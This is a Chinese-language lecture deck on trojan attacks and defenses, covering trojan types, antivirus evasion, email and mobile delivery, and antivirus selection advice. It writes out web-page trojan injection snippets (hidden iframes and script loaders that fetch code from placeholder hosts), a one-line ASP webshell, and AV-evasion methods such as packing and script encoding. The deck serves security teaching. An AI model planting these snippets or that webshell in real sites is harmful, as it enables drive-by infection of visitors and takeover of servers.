網路攻防戰 之 木馬入侵大揭秘 講師 呂守箴 大綱 攻擊第一招 : 木馬產生術 為什麼會有木馬病毒? 類型一 : 原生型木馬 類型二 : 漏洞型木馬 類型三 : 網頁木馬 攻擊第二招 : 避過防毒軟體的方式 木馬與病毒的偽裝術 攻擊第三招 : 木馬傳送的手法與利用的管道 郵件社交工程的病毒傳輸方式 隨身裝置 : 智慧型手機與平板電腦的病毒 防禦大絕招 : 防制手段 常見防毒與防間諜軟體的應用
攻擊第一招 : 木馬產生術 使用木馬的考量與優點 : 木馬的特性 木馬具有的功能 木馬的隱藏 木馬的類別 原生型木馬 漏洞型木馬 網頁型木馬 ( 註 : 此分類並不是防毒軟體公司針對木馬的分類 ) 木馬的類別 原生型木馬 : 常見的附檔名 :.exe.com 此種木馬本身就是一個完整的遠端控制型的木馬程 序, 不需要依賴漏洞 例如 : 灰鴿子 依木馬的特點與操作方法, 在中國大陸上, 可分為第一代 ~ 第五代木馬的類型 ( 對岸網路上的消息, 一般防毒軟體公司並沒有這樣的分類 )
中國大陸木馬的發展與分類 第一代木馬 : 主要對付 Unix 系統, 而 Windows 當時為數不多, 代表作 :BO NetSpy 等 第二代木馬 : 建構了目前大多數駭客對木馬定義的功能, 這時期開始 Windows 型木馬改為主流, 代表作 :BO2000 Sub7 冰河等 第三代木馬 : 增加了穿透防火牆的功能 ( 反向連結 ) 等技術來逃避單機型防火牆及 IP 分享器之功能 代表作 : 灰鴿子家族 第四代木馬 : 再增加了執行緒隱藏技術 DLL Injection 並漸漸往 Rootkit 技術整合, 使系統更加難以發現木馬的存在與入侵的連接 代表作 : 戶外幽靈 GWBOY 殭屍程式等 第五代木馬 : 再增加可隨機替換掉一個狀態為停止的系統服務, 不會在 Registry 中新增任何的值, 安裝後木馬的檔名 與存放的目錄與路徑都是隨機的, 會自動關閉自己隨機選的 port 等需要時再隨機選一個傳輸 代表作 : 暗黑天使等
不管是哪種類別的木馬 ( 網頁木馬 asp 木馬等 ), 最終都是需要將 exe 檔的木馬傳至被害 ( 駭 ) 的電腦中, 只是利用不同的傳播類型增加防禦設備攔截的困難度 感染後的行為可能 : 直接使用該木馬 exe 做竊取 使用 DLL Injection 技巧與正常程式綑綁的木馬做竊取 使用 Rootkit 技巧與系統程式綑綁的木馬做竊取 原生型木馬的感染流程 駭客 P2P 網站 論壇 程式的收集區 不知情的一般使用者 原生型木馬
反向 ( 反彈 ) 連結木馬傳輸方式 攻擊網站並植入網頁後門, 等不知情的民眾上網站時下載木馬 駭客 尋正常程式的 port 與行為傳出資料 被植入木馬的使用者 防火牆 中間代理網站或惡意程式的網站 木馬的類別 漏洞型木馬 : 常見的附檔名 :.exe.htm.html 必須依賴系統 瀏覽器 應用程式的漏洞才能產生感染及植入的惡意行為 例如 :MS07017 等
此類型的木馬也可大致上分為二類 : 利用木馬產生器產生出類似於原生型木馬的.exe 檔, 再利用各種社交工程手法傳給目標主機, 與原生型木馬的差別在於, 如果目標主機不具有 相對應的漏洞則不會觸發之後的感染行為 利用木馬產生器產生出僅具有 HTML 程式碼的.htm 檔, 再利用網頁瀏覽或者掛馬呼叫網頁的方 式來觸發需要呼叫的.exe 檔木馬 漏洞型木馬的感染流程 駭客 知名的官方網站 首頁或其他網頁被植入 <ifrme> 隱藏框架引導到跳版網站 首頁 網路釣魚 不知情的一般使用者 跳版網站 原生型木馬 漏洞型網馬
網站 網頁掛馬語法 框架掛馬 : <iframe src= 木馬網址 width=0 height=0></iframe> JScript 文件掛馬 : 首先將以下語法存檔為 xxx.js 然後將此文件利用各種方式上傳到目標處 document.write("<iframe width='0' height='0' src=' 木馬網址 '></iframe>"); 最後 JScript 掛馬的語法為 : <script language=javascript src=xxx.js></script> JScript 變型加密 : <SCRIPT language= JScript.Encode src=http://www.xxx.com/muma.txt></script> muma.txt 可改成任何附檔名 body 掛馬 : <body onload="window.location=' 木馬網址 ';"></body> 隱藏掛馬 : top.document.body.innerhtml = top.document.body.innerhtml + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>'; CSS 中掛馬 : 先將製作好的 muma.js 先利用各種方式上傳至目標處 body { background-image: url('javascript:document.write("<script src=http://www.xxx.net/muma.js></script>")')} JAVA 掛馬 : <SCRIPT language=javascript> window.open (" 木馬網址 ","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 圖片偽裝 : <html> <iframe src=" 網馬網址 " height=0 width=0></iframe> <img src=" 圖片網址 "> </html> 偽裝呼叫 : <frameset rows="444,0" cols="*"> <frame src=" 開啟的網頁 " framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src=" 網馬網址 " frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> 欺騙超連結網址手法 : <a href="http://www.xyz.com( 迷惑他人超連結網址, 故意顯示這個網址卻連向木馬網址 )" onmouseover="www_163_com(); return true;"> 網頁要顯示的內容 </a> <SCRIPT Language="JavaScript"> function www_xyz_com () { var url=" 真正連的網頁木馬網址 "; open(url,"newwindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,r esizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); } </SCRIPT>
木馬的類別 網頁型木馬 : 常見的附檔名 :.asp.aspx.php 還可分為二種型式 : Asp 網馬或 php 網馬 : 就是利用 asp 或 php 語法並已經添加好各種可以控制檔案的指令所撰寫出來的一個 Web 介面的類似檔案總管的 網頁, 也稱之為 Webshell ( 還可細分為含 FSO 檔案瀏覽功能與不含 FSO 的網頁木馬 ) 一句話網頁木馬 : 只利用一行語法來傳值的木馬 例如 :<%eval request( value )> 網頁型木馬的感染流程 駭客 知名的官方網站 [ 上傳 ] 具 FSO 功能的網頁木馬 不知情的一般使用者 首頁 [ 掛馬 ] 將首頁或其他網頁植入 <ifrme> 隱藏框架引導到跳版網站 跳版網站 原生型木馬 漏洞型網馬
參考資料 : 使用 FileSystemObject 存取檔案 http://msdn.microsoft.com/library/cht/default.asp?url=/library/c HT/vbcn7/html/vbconintroductiontofilesystemobjectmodel.asp 使用 ASP 與 Scripting.FileSystemObject 來建立動態目錄頁 http://support.microsoft.com/kb/218606/zh-tw 如何使用 ASP 建立檔案檢視器 http://support.microsoft.com/kb/272656/zh-tw 如何使用 ASP 建立目錄檢視器 http://support.microsoft.com/kb/272662/zh-tw 攻擊第二招 : 避過防毒軟體的方式 要避過防毒軟體的方式此行為稱之為免查殺或免殺 常用的方式便是針對木馬的執行檔進行 加殼 : 對.exe 壓縮 ( 瘦身 ) 或加密 ( 阻擋反組譯 ) 等重組變形 加花指令 ( 加花 ): 對.exe 的 PE 增加跳躍 無效字元等指令 編碼 : 對.htm 的 HTML 語法做函數的編碼 加密 : 對.htm 的 HTML 語法做加密 當進行這些程序後木馬便會變更其 特徵值 使防毒軟體對該木馬的檔案辨識不出來進而放行
木馬的假面具 : 綑綁合併術 木馬的植入程式大多是.exe 檔, 大部分有警覺心的使用 者及管理員均不會去點選 所以必須要使用綑綁正常 程式 ( 常見 Flash 或 Office 檔案 ) 之方法, 誘騙 ( 社交工程 ) 目標去點選來達成目的 為了不引起懷疑, 入侵者可以把正常程式 ( 好康程式 小遊戲 序號程式 免光碟程式 ) 與木馬程式合併成一個檔案來作為偽裝 木馬的偽裝 : 編碼與加密 常見於網頁型的木馬, 將 HTML 內 Script 語法做 編碼或加密, 來迷惑防毒軟體或 Web 攔截程式, 來達到免殺的目的 常用函數 : Escape 加密函數與 unescape 解密函數 Encode 加密函數 添零 ( 加空格 ) 加密 自寫函數加密
可疑檔案上傳分析 : 利用各家防毒軟毒軟體的掃描引擎, 同時對單一一個檔案, 作是否為病毒 木馬檔案的分析可協助檢測確認檔案本身是否異常 VirusTotal: 免費線上病毒和惡意軟體掃瞄 http://www.virustotal.com/zh-tw/ VirSCAN.org: 線上防毒引擎掃描網站 v1.00 目前支援 36 款防毒引擎 http://www.virscan.org/ Online malware scan http://virusscan.jotti.org/
注意事項 : 目前攻擊端使用 加殼 加花指令 ( 加花 ) 編碼 加密 來逃避防毒軟體特徵值的偵測, 是目前決定惡意程式是否能成功的關鍵 防禦端的解決方案 : 改善防毒軟體引擎的偵測 ( 病毒碼的更新頻率 ) 增加對感染行為的規則判斷 ( 主動式防禦 ) 多重引擎交叉比對 閘道端與主機端採用不同防毒規畫 增加主動式防火牆的攔截機制 攻擊第三招 : 木馬傳送的手法與利用的管道 惡意超連結 : 網站 討論區 部落格等 郵件社交工程的病毒傳輸方式 隨身裝置 : 智慧型手機與平板電腦的病毒
郵件社交工程攻擊模式 Internet 1. 駭客設計攻擊陷阱程式 ( 如特殊 Word 檔案或外部惡意連結 ) 2. 將攻擊程式置入電子郵件中 3. 寄發電子郵件給特定的目標 4. 受害者開啟開啟電子郵件 5. 啟動駭客設計的陷阱, 將被植入後門程式 6. 後門程式逆向連接, 向遠端駭客報到 傳送郵件的考量 可行的話將郵件傳送格式從 HTML 格式改用 純文字 txt 格式 ( 工具 選項 讀取及傳送 ) 公務用 (xxx@mail.xyz.gov.tw) 與 個人 E-Mail (xxx@yahoo.com) 信箱請分開使用 寄件人改用 密件副本
設定郵件傳送格式 密件副本
接收郵件的考量 垃圾郵件 匿名郵件及偽造郵件攻擊 關閉郵件預覽功能 落實郵件附件檔掃毒 垃圾郵件 匿名郵件及偽造郵件攻擊 利用匿名郵件 ( 例如 : 要求回信 ) 利用好康郵件 ( 例如 : 程式下載 中獎 ) 利用連鎖信 ( 例如 : 佛像郵件 ) 利用尋人郵件 ( 例如 : 尋找失蹤兒 ) 利用愛心郵件 ( 例如 : 骨髓配對 勵志小故事 ) 利用銀行郵件 利用廣告郵件 ( 例如 : 折價卷 ) 利用情色郵件
郵件附件檔 將附件檔 另存新檔 後掃描病毒, 不可以直接點選 2 下打開 修補 Microsoft Office Adobe Reader 等的相關讀取程式的弱點 如果不確定所收到的檔案是否有問題, 使用 可疑檔案上傳分析 確認 WebMail 的傳送與接收 WebMail 的使用原則, 跟本機 Mail 的注意事項也是一樣的 但 WebMail 更需要注意 預覽視窗 以及 超連結 的點選 雖然 WebMail 的附件檔並沒有收下來, 但若不注意仍有可能發生點選到有毒附件檔 WebMail 更需要經常 變更密碼, 來避免被他人竊取 盡量避免在他人或公用電腦中使用 WebMail, 有可能該電腦 已經中毒 如果一定要用, 使用前先掃毒 離開前請 登出 並要 清除瀏覽器的 Cookie, 避免帳號密碼被記住
收信軟體安全性設定 以微軟的 outlook express 收信軟體為例, 建議進行以下安全性的設定 : 1. 取消 郵件預覽 2. 取消 在預覽窗格檢視郵件時自動下載郵件 3. 勾選 以純文字閱讀所有郵件 4. 設定安全性區域為 受限制的網站區域 5. 勾選 在其他應用程式試圖以我的名義傳送電子郵件時警告我 6. 勾選 在附件有可能有病毒時不允許儲存或開啟 7. 勾選 阻擋 HTML 電子郵件中的圖片和其他外部內容 手機防護 當使用者越來越仰賴 iphone Android 等智慧手機 平板電腦, 單位的安全防護網將會面臨有別於傳統的新風險 不只要防範鎖定手機伺機入侵的木馬和惡意程式, 還得 預防遺失手機而導致資料外洩的風險 伴隨著手機進入單位的 3G 網路, 更是輕易跳過內網 管制的防線 傳統的防護網已經逐漸瓦解, 單位必須正視行動應用帶來的新風險, 才能有效鞏固防護網
私人手機成行動安全管理的困境 許多 IT 部門主管最傷腦筋的一件事情就是, 現在很多用於企業行動服務的手機都是私人的, 並非公司配發的, 這也造成公司在行動裝置控管上的困難 手機越獄不違法但不安全 最近接連陸續傳出手機應用程式的安全威脅事件, 就連 Android 官方軟體市集也一連出現了 50 多款通過審查上架的 App 暗藏惡意木馬程式, 迫使 Google 動用遠端刪除權限來移除使用者設備中的惡意程式
再加上手機破解 越獄被美國政府視為消費者合法使用權力之一, 各種破解工具越來越自動化, 甚至出現全自動的破解 App, 按一個鈕就可以讓 iphone 越獄 讓 Android 破解, 使用者可以任意取得管理者權限, 讓智慧手機預設的安全機制防護洞開, 更容易成為惡意程式竊取企業資料的溫床 7 大非法獲利模式 Android 安全風險高 根據賽門鐵克最新研究報告指出, 就目前針對 Android 平台而開發的行動惡意軟體來看, 可能的謀利方式共有以下 7 種 : 1. 帳單詐騙 2. 追蹤與監控手機的間諜軟體 3. 搜尋引擎中毒連上特定 URL 網址 4. 點擊付費廣告提高廣告點閱數 5. 將惡意程式偽裝成和這些 APP 同名的假冒軟體隨安裝次數付費 6. 重新包裝或複製一個受歡迎且合法的遊戲程式騙取廣告收入 7. 竊取網路銀行交易確認碼 雖然現在藉由行動惡意軟體非法獲利的比率並不高, 但隨著民眾逐漸汰換現有手機 轉而使用智慧型手機, 未來 Android 行動攻擊的投資報酬率將會愈來愈高, 使用手機的安全風險也將隨之增加
情色桌布竟是高危險木馬 簡訊殭屍 專偷網銀密碼 偽裝成情色動態桌布等軟體誘惑使用者下載安裝之後, 通過獲取積分等名義誘導使用者安裝惡意木馬程式 惡意木馬程式偽裝成 Android 系統服務, 在後台監聽和攔截使用者簡訊, 並留有後門, 使得任何人都可以通過發送簡訊指令的方式來遠程操縱該手機, 竊取用戶隱私 發送詐騙簡訊 偽造釣魚訊息等 手機防護 :Android /ios 解決策略 : 不安裝 來路不明 的小遊戲或軟體 移除不需要或不常用的小遊戲或軟體 安裝防毒軟體或防護程式 不要越獄跟破解手機
防禦大絕招 : 防制手段 常見防毒與防間諜軟體的應用 挑選防毒軟體的原則 迷思一 : 偵測率 ( 檢查出病毒的比例 ) 越高越好? 病毒碼 ( 病毒特徵值 ) 越多越好?
挑選防毒軟體的原則 病毒的偵測率也是最多評比機構所評比的選項與 依據, 意指 發現 病毒的比率 偵測率越高, 表示對發現病毒的誤判機率也越高, 越容易造成對使用者的干擾 病毒碼每家防毒軟體廠商製作方式並不相同也未有統一, 有的同種但不同型的病毒算一種病毒碼 有的同種但不同型的算 2~3 種, 病毒碼的命名 判定等多寡由於並無統一的國際組織規範, 所以有灌水之嫌疑 挑選防毒軟體的原則 迷思二 : 攔截率 ( 阻止病毒的感染 ) 越高越好? 誤報率 ( 錯誤判斷檔案的行為 ) 越低越好?
挑選防毒軟體的原則 攔截率一詞並不等同偵測率 能發現病毒的存在 ( 偵測 ) 病毒並不代表能夠阻止 ( 攔截 ) 病毒寫入 感染 擴散 下載的殺毒行為 攔截率越高, 表示對病毒行為的誤判機率也越高, 越容易造成對使用者的干擾 部分防毒軟體會將單機防火牆 HIPS 沙盒 信譽評等額外元件, 列入在攔截功能內, 評比時應單獨看待 挑選防毒軟體的原則 迷思三 : 解毒率 治療率 恢復率 ( 將檔案恢復原狀的比例 ) 越高越好?
挑選防毒軟體的原則 能發現 ( 偵測 ) 並不一定能阻止 ( 攔截 ) 能阻止 ( 攔截 ) 並不一定能治療 ( 解毒 ) 使用防毒軟體最重要的不就是 讓檔案在遭受感染後能恢復原狀 的解毒能力 可惜並沒有哪一家機構在評比這個比率, 頂多使用 隔離區 來延緩無法治療的檔案 或者不治療檔案還可以使用, 一旦進行解毒行為, 反而整個檔案損毀 挑選防毒軟體的原則 迷思四 : 掃描速度越快越好 ( 佔用的記憶體少 )? 掃描速度越慢越好 ( 掃描的完整度越好 )?
挑選防毒軟體的原則 掃描數度的快慢取決於防毒軟體的掃描引擎佔用記憶體的比例 這應該分開成 2 個角度來評比 佔用的常駐記憶體 ( 開啟的元件越多自然佔越大 ) 佔用的掃描記憶體 ( 比對的越詳細自然佔越大 ) 事實上評比掃描時所佔用的記憶體來決定快慢,, 一方面快慢是種感覺, 二方面掃描時多利用離峰時間, 三來也有使用背景掃描, 所以並沒太大的意義 挑選防毒軟體的原則 迷思五 : 防毒軟體所提供的附加功能 元件 ( 例 : 防火牆 HIPS 沙盒 信譽評等 動態鍵盤 垃圾郵件 家長監護 遠端遙控 軟體介面友善性 ); 越多越好?
挑選防毒軟體的原則 一點都不好 ; 你到底是評比防毒軟體還是在買 大補帖? 載入越多的元件與功能, 防毒的效能當然就越差 除非是資訊人員, 不然再友善的軟體介面, 對一般使用者來說通通不會用 你確定這些額外元件在做甚麼用途? 防火牆 HIPS: 攔截對外聯絡的傳輸 沙盒 : 建立一個虛擬空間模擬寫入檔案行為 信譽評等 : 評鑑網址 (URL) 的安全性 動態鍵盤 : 防止鍵盤側錄 垃圾郵件 : 防止郵件社交工程 家長監護 : 過濾色情網站 遠端遙控 : 遠端解毒 挑選防毒軟體的原則 迷思六 : 經由具公信力的防毒軟體評測機構 ( 例如 : AV- Comparatives AV-TEST) 檢測各家軟體綜合性的防毒效能, 並提出嚴謹的檢測報告或評比, 這樣是否可以當作採購參考?
挑選防毒軟體的原則 除非你的防毒軟體是 每一季 就換一家, 不然這樣的評比對於授權合約普遍是 1~2 年來說, 一點幫助都沒有 此一時彼一時, 採買當時最好的防毒軟體, 並不代表 1~2 年後依然派得上用場 挑選防毒軟體的原則 迷思七 : 收集自己電腦或企業單位中毒的病毒樣本, 請各家不同的防毒軟體公司分析, 是否比較具有參考價值?
挑選防毒軟體的原則 所謂挑選防毒軟體的原則就是要挑 適合 自己電腦或企業單位的軟體 安裝一大堆自己根本就不會感染病毒的防毒軟體, 只是在拖垮自己電腦的效能, 還不見得有效 只是大多數使用者或者資訊人員並沒有 收集 單位內病毒樣本的習慣, 以至於無從評比起 進而重複前述幾種迷思 雲端防毒軟體 傳統的防毒軟體, 會將全部的病毒碼安裝及下載在用戶端電腦上, 而一般用戶端病毒在感染時, 大多僅使用其中 20% 的病毒特徵, 卻要使用 100% 的病毒特徵來掃毒 造成 : 病毒碼越多 載入越慢 佔用的記憶體就越多 病毒碼越多 掃描越慢 越沒有效率
雲端防毒軟體 使用主動式雲端攔截技術, 僅保留 20% 常用及危險性較高的病毒碼, 藉此提升電腦存取病毒碼的效率 而剩餘的 80% 病毒碼則放在原廠的伺服器裡, 當防毒軟體辨識到其它具危險性的檔案或行為時, 就會連上伺服器來檢查, 更新資料及攔截 如果是首次出現的病毒檔案, 也可能會把整個病毒上傳 假如這個病毒先前已經在雲端被檢測過, 就會直接回傳放行或封鎖的訊號給用戶端 雲端防毒軟體 : ( 缺點 ) 封閉網路 隔離區段 單機不上網的電腦 不適合 下載 比對 更新時易頻繁佔用對外網路頻寬 未提供那些病毒碼要留在本機 那些要留在遠端的選項, 易掛一漏萬反而該攔截的沒在本機上 如果是買半套 ( 一部分用雲端版 一部份用完整版, 通常是 NB PC 混買 ), 需要買 2~3 種以上不同的防毒軟體授權 針對企業級的防毒軟體, 不見得有提供雲端版 + 完整版的防毒報表 雲端版防毒軟體並不會掃毒放在雲端上的檔案資料 ( 例如 : Dropbox)
結論 攻擊第一招 : 木馬產生術 為什麼會有木馬病毒? 類型一 : 原生型木馬 類型二 : 漏洞型木馬 類型三 : 網頁木馬 攻擊第二招 : 避過防毒軟體的方式 木馬與病毒的偽裝術 攻擊第三招 : 木馬傳送的手法與利用的管道 郵件社交工程的病毒傳輸方式 隨身裝置 : 智慧型手機與平板電腦的病毒 防禦大絕招 : 防制手段 常見防毒與防間諜軟體的應用 講師 : 呂守箴 E-Mail:shooujen@gmail.com 部落格 : 網路攻防戰 :http://anti-hacker.blogspot.com Plurk 噗浪 : http://www.plurk.com/openblue FB 粉絲團 :https://www.facebook.com/netwargame G+ 專頁 :https://plus.google.com/u/0/118062628172252352420 Youtube 影片頻道 :http://www.youtube.com/user/openblue 網路直播頻道 :http://zh-tw.justin.tv/openbluetv